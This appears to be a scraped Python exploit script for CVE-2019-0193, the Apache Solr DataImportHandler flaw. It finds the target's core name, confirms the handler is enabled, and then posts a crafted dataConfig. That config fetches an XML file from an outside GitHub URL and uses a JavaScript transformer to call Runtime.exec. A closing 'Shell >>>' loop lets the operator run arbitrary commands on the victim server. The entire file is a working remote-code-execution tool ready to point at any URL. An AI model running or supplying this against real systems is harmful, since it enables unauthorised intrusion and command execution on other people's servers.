92 lines
3.0 KiB
Python
92 lines
3.0 KiB
Python
#coding=utf-8
|
|
|
|
import requests
|
|
import sys
|
|
import json
|
|
import urllib.parse
|
|
|
|
if len(sys.argv)!=2:
|
|
print('+ USE: python3 cve-2019-0193.py <url> +')
|
|
sys.exit(0)
|
|
|
|
url = sys.argv[1]
|
|
vuln_url = url + "/solr/test/dataimport"
|
|
cmd = "whoami"
|
|
|
|
|
|
#get core name
|
|
core_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
|
|
try:
|
|
r = requests.request("GET", url=core_url, timeout=20)
|
|
core_name = list(json.loads(r.text)["status"])[0]
|
|
print ("[+] GET CORE NAME: "+url+"/solr/"+core_name+"/config")
|
|
except:
|
|
print ("[-] Target Not Vuln Good Luck")
|
|
sys.exit(0)
|
|
|
|
#check mode
|
|
mode_url = url + "/solr/" +core_name+ "/admin/mbeans?cat=QUERY&wt=json"
|
|
r = requests.request("GET", url=mode_url, timeout=20)
|
|
mode = dict(dict(list(json.loads(r.text)["solr-mbeans"])[1])['/dataimport'])['class']
|
|
if "org.apache.solr.handler.dataimport.DataImportHandler" in mode:
|
|
print ("[+] FIND MODE: "+mode)
|
|
else:
|
|
print ("[-] Target Not Vuln Good Luck")
|
|
sys.exit(0)
|
|
|
|
exp_url = url + "/solr/" +core_name+ "/dataimport"
|
|
|
|
headers = {
|
|
'Host': "localhost:8983",
|
|
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
|
|
'Accept': "application/json, text/plain, */*",
|
|
'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
|
|
'Accept-Encoding': "zip, deflate",
|
|
'Referer': ""+url+"/solr/",
|
|
'Content-type': "application/x-www-form-urlencoded",
|
|
'X-Requested-With': "XMLHttpRequest",
|
|
'Content-Length': "1007",
|
|
'Connection': "close"
|
|
}
|
|
|
|
def do_exp(cmd):
|
|
payload = """
|
|
command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test&name=dataimport&dataConfig=
|
|
<dataConfig>
|
|
<dataSource type="URLDataSource"/>
|
|
<script><![CDATA[
|
|
function poc(row){
|
|
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("%s").getInputStream()));
|
|
var result = [];
|
|
while(true) {
|
|
var oneline = bufReader.readLine();
|
|
result.push( oneline );
|
|
if(!oneline) break;
|
|
}
|
|
row.put("title",result.join("\\n\\r"));
|
|
return row;
|
|
}
|
|
]]></script>
|
|
<document>
|
|
<entity name="entity1"
|
|
url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
|
|
processor="XPathEntityProcessor"
|
|
forEach="/RDF/item"
|
|
transformer="script:poc">
|
|
<field column="title" xpath="/RDF/item/title" />
|
|
</entity>
|
|
</document>
|
|
</dataConfig>
|
|
""" % cmd
|
|
r = requests.request("POST", url=exp_url, data=payload, headers=headers, timeout=30)
|
|
try:
|
|
get_r = list(json.loads(r.text)["documents"])[0]
|
|
q = dict(get_r)['title']
|
|
print (q)
|
|
except:
|
|
print ("[*] Please wait... ... (About 1 minute)")
|
|
|
|
while 1:
|
|
cmd = input("Shell >>> ")
|
|
if cmd == "exit" : exit(0)
|
|
do_exp(cmd) |